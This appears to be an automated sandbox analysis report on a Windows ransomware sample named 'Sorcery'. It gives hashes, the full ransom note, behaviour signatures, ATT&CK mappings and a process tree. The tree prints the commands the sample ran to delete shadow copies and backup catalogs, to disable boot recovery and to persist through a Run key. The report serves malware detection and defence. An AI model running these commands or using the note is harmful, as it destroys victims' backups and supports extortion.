Analysis

  • max time kernel
    499s
  • max time network
    509s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-07-2024 06:30

General

  • Target

    275d0d15fa3582e848f05daa76d351e10ce3d7072e9c987eee1a1f606c714a97.exe

  • Size

    49KB

  • MD5

    c2734e516454c7af7354a7a4d25cdfa1

  • SHA1

    ad062ffc6cc642ed47549f172e085c15e4902466

  • SHA256

    275d0d15fa3582e848f05daa76d351e10ce3d7072e9c987eee1a1f606c714a97

  • SHA512

    dc32973cbe1b12f27c9d78702f8efb307f48f521529d0ad4cd70426bfcacb697a3dd761246cc7bd40235c51d7b1bced2eeee78bd7ac82ad297c314a80d753367

  • SSDEEP

    1536:dQFgpLzLiugEBVw9wrLM+7UUjl0FSrXaN:CF4zLi9EBpg+3XaN

Malware Config

Extracted

Path

C:\Users\Public\Desktop\README.hta

Ransom Note
<!DOCTYPE html> <html> <head> <title>SORCERY RANSOMWARE NOTE</title> <style> body { background-color: black; color: green; font-family: Arial, sans-serif; } .important { color: red; } h1, h2 { color: red; } </style> </head> <body> <h1>SORCERY RANSOMWARE NOTE</h1> <h2>What happened?</h2> <p>All of your files are encrypted and stolen. Stolen data will be published soon on our Tor website. There is no way to recover your data and prevent data leakage without us. <span class='important'>Decryption is not possible without the private key.</span> Don't waste your and our time trying to recover your files on your own; it is impossible without our help.</p> <h2>What is Ransomware?</h2> <p>Ransomware is a type of malicious software that encrypts your files and demands a ransom payment to restore access to them. Once your files are encrypted, you will not be able to open or use them without a special decryption key. In addition to encrypting your files, ransomware can also steal your data and threaten to publish it if the ransom is not paid.</p> <h2>What is a Decryptor?</h2> <p>A decryptor is a tool that can reverse the encryption applied by ransomware, allowing you to regain access to your files. The decryptor requires a unique private key, which is held by the attackers. Without this key, it is impossible to decrypt your files.</p> <h2>How to recover files & prevent leakage?</h2> <p>We promise that you can recover all your files safely and prevent data leakage. <span class='important'>We can do it!</span></p> <h2>Contact Us</h2> <p><span class='important'>Email:</span> [email protected]</p> <p><span class='important'>Enter DECRYPTION ID:</span> S10</p> <p>You need to contact us within <span class='important'>24 hours</span> so that we can discuss the price for the decryptor.</p> </body> </html>
Emails

Signatures

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Renames multiple (119) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 60 IoCs
  • Suspicious use of AdjustPrivilegeToken 51 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\275d0d15fa3582e848f05daa76d351e10ce3d7072e9c987eee1a1f606c714a97.exe
    "C:\Users\Admin\AppData\Local\Temp\275d0d15fa3582e848f05daa76d351e10ce3d7072e9c987eee1a1f606c714a97.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4872
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'HWMonitor';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'HWMonitor' -Value '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\HWMonitor\HWMonitor.exe"' -PropertyType 'String'
      2⤵
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2560
    • C:\Users\Admin\AppData\Local\Temp\275d0d15fa3582e848f05daa76d351e10ce3d7072e9c987eee1a1f606c714a97.exe
      "C:\Users\Admin\AppData\Local\Temp\275d0d15fa3582e848f05daa76d351e10ce3d7072e9c987eee1a1f606c714a97.exe"
      2⤵
        PID:4848
      • C:\Users\Admin\AppData\Local\Temp\275d0d15fa3582e848f05daa76d351e10ce3d7072e9c987eee1a1f606c714a97.exe
        "C:\Users\Admin\AppData\Local\Temp\275d0d15fa3582e848f05daa76d351e10ce3d7072e9c987eee1a1f606c714a97.exe"
        2⤵
          PID:4932
        • C:\Users\Admin\AppData\Local\Temp\275d0d15fa3582e848f05daa76d351e10ce3d7072e9c987eee1a1f606c714a97.exe
          "C:\Users\Admin\AppData\Local\Temp\275d0d15fa3582e848f05daa76d351e10ce3d7072e9c987eee1a1f606c714a97.exe"
          2⤵
          • Checks computer location settings
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:316
          • C:\Users\Admin\AppData\Local\rundll32.exe
            "C:\Users\Admin\AppData\Local\rundll32.exe"
            3⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3900
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'HWMonitor';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'HWMonitor' -Value '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\HWMonitor\HWMonitor.exe"' -PropertyType 'String'
              4⤵
              • Adds Run key to start application
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4328
            • C:\Users\Admin\AppData\Local\rundll32.exe
              "C:\Users\Admin\AppData\Local\rundll32.exe"
              4⤵
              • Executes dropped EXE
              PID:2040
            • C:\Users\Admin\AppData\Local\rundll32.exe
              "C:\Users\Admin\AppData\Local\rundll32.exe"
              4⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Adds Run key to start application
              • Sets desktop wallpaper using registry
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2376
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:2572
                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                  wmic shadowcopy delete
                  6⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1180
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
                5⤵
                  PID:3152
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
                  5⤵
                    PID:4500
          • C:\Windows\system32\vssvc.exe
            C:\Windows\system32\vssvc.exe
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:436

          Network

          MITRE ATT&CK Matrix ATT&CK v13

          Execution

          Windows Management Instrumentation

          1
          T1047

          Persistence

          Boot or Logon Autostart Execution

          1
          T1547

          Registry Run Keys / Startup Folder

          1
          T1547.001

          Privilege Escalation

          Boot or Logon Autostart Execution

          1
          T1547

          Registry Run Keys / Startup Folder

          1
          T1547.001

          Defense Evasion

          Indicator Removal

          1
          T1070

          File Deletion

          1
          T1070.004

          Modify Registry

          2
          T1112

          Discovery

          Query Registry

          1
          T1012

          System Information Discovery

          2
          T1082

          Impact

          Inhibit System Recovery

          1
          T1490

          Defacement

          1
          T1491

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\275d0d15fa3582e848f05daa76d351e10ce3d7072e9c987eee1a1f606c714a97.exe.log
            Filesize

            1KB

            MD5

            b5291f3dcf2c13784e09a057f2e43d13

            SHA1

            fbb72f4b04269e0d35b1d9c29d02d63dbc7ad07e

            SHA256

            ad995b51344d71019f96fc3a424de00256065daad8595ff599f6849c87ae75ce

            SHA512

            11c89caac425bccaa24e2bb24c6f2b4e6d6863278bf8a5304a42bb44475b08ca586e09143e7d5b14db7f1cd9adacd5358769e0d999dc348073431031067bd4d4

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
            Filesize

            1KB

            MD5

            def65711d78669d7f8e69313be4acf2e

            SHA1

            6522ebf1de09eeb981e270bd95114bc69a49cda6

            SHA256

            aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c

            SHA512

            05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            18KB

            MD5

            b95dcdafeb5ae5a6881df7746ed0dc74

            SHA1

            15b3b5ccb0a0f0505ca65698c890c57475cdfa33

            SHA256

            d98a2ecbfe74a7d00fef78a3d58785bf1a6862a2e518b2bd4eb98e429bce1dda

            SHA512

            bb69747aaf9de909f8df9710596cc1b7d2b732a7212ede8108af691755c4ed4ba41d1cf6426944c33f57781b2044b5d8786fd693a909a6076d14327f217a65be

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yomwssix.23n.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Users\Admin\AppData\Local\rundll32.exe
            Filesize

            49KB

            MD5

            c2734e516454c7af7354a7a4d25cdfa1

            SHA1

            ad062ffc6cc642ed47549f172e085c15e4902466

            SHA256

            275d0d15fa3582e848f05daa76d351e10ce3d7072e9c987eee1a1f606c714a97

            SHA512

            dc32973cbe1b12f27c9d78702f8efb307f48f521529d0ad4cd70426bfcacb697a3dd761246cc7bd40235c51d7b1bced2eeee78bd7ac82ad297c314a80d753367

          • C:\Users\Public\Desktop\README.hta
            Filesize

            1KB

            MD5

            72c1db68d8b6d084a4649a8e645b4b9b

            SHA1

            b2412983edbb2f85abcf091d2df8d01cb52a6116

            SHA256

            c3c694124e9ae89e652cd8294ff0d0c452c7185db91fc8758198ce15d83ab1ed

            SHA512

            77ef54064c7ed8bab1903b2d8d22942943fc0ac1757b5404e53deb3374edd97e14069741730170198e8bd7a24dba79942f6eebd26b2651c71d640b834dd41ff7

          • memory/316-11-0x0000000000400000-0x000000000040E000-memory.dmp
            Filesize

            56KB

          • memory/316-44-0x0000000074840000-0x0000000074FF0000-memory.dmp
            Filesize

            7.7MB

          • memory/316-14-0x0000000074840000-0x0000000074FF0000-memory.dmp
            Filesize

            7.7MB

          • memory/2560-47-0x0000000006A90000-0x0000000006B26000-memory.dmp
            Filesize

            600KB

          • memory/2560-48-0x0000000006A20000-0x0000000006A3A000-memory.dmp
            Filesize

            104KB

          • memory/2560-13-0x0000000004FB0000-0x0000000004FE6000-memory.dmp
            Filesize

            216KB

          • memory/2560-52-0x0000000074840000-0x0000000074FF0000-memory.dmp
            Filesize

            7.7MB

          • memory/2560-49-0x0000000006B30000-0x0000000006B52000-memory.dmp
            Filesize

            136KB

          • memory/2560-15-0x0000000074840000-0x0000000074FF0000-memory.dmp
            Filesize

            7.7MB

          • memory/2560-17-0x0000000005620000-0x0000000005C48000-memory.dmp
            Filesize

            6.2MB

          • memory/2560-18-0x0000000074840000-0x0000000074FF0000-memory.dmp
            Filesize

            7.7MB

          • memory/2560-20-0x0000000005C80000-0x0000000005CA2000-memory.dmp
            Filesize

            136KB

          • memory/2560-21-0x0000000005E80000-0x0000000005EE6000-memory.dmp
            Filesize

            408KB

          • memory/2560-27-0x0000000005EF0000-0x0000000005F56000-memory.dmp
            Filesize

            408KB

          • memory/2560-46-0x0000000006560000-0x00000000065AC000-memory.dmp
            Filesize

            304KB

          • memory/2560-39-0x0000000005F60000-0x00000000062B4000-memory.dmp
            Filesize

            3.3MB

          • memory/2560-45-0x0000000006520000-0x000000000653E000-memory.dmp
            Filesize

            120KB

          • memory/4328-99-0x0000000005C30000-0x0000000005F84000-memory.dmp
            Filesize

            3.3MB

          • memory/4328-196-0x00000000063A0000-0x00000000063EC000-memory.dmp
            Filesize

            304KB

          • memory/4872-7-0x0000000074840000-0x0000000074FF0000-memory.dmp
            Filesize

            7.7MB

          • memory/4872-5-0x0000000005230000-0x00000000052A6000-memory.dmp
            Filesize

            472KB

          • memory/4872-0-0x000000007484E000-0x000000007484F000-memory.dmp
            Filesize

            4KB

          • memory/4872-9-0x00000000051C0000-0x00000000051DE000-memory.dmp
            Filesize

            120KB

          • memory/4872-16-0x0000000074840000-0x0000000074FF0000-memory.dmp
            Filesize

            7.7MB

          • memory/4872-8-0x0000000004F40000-0x0000000004F50000-memory.dmp
            Filesize

            64KB

          • memory/4872-3-0x0000000004F60000-0x0000000004FF2000-memory.dmp
            Filesize

            584KB

          • memory/4872-6-0x0000000074840000-0x0000000074FF0000-memory.dmp
            Filesize

            7.7MB

          • memory/4872-2-0x0000000005630000-0x0000000005BD4000-memory.dmp
            Filesize

            5.6MB

          • memory/4872-1-0x0000000000530000-0x0000000000542000-memory.dmp
            Filesize

            72KB

          • memory/4872-4-0x0000000004F50000-0x0000000004F5A000-memory.dmp
            Filesize

            40KB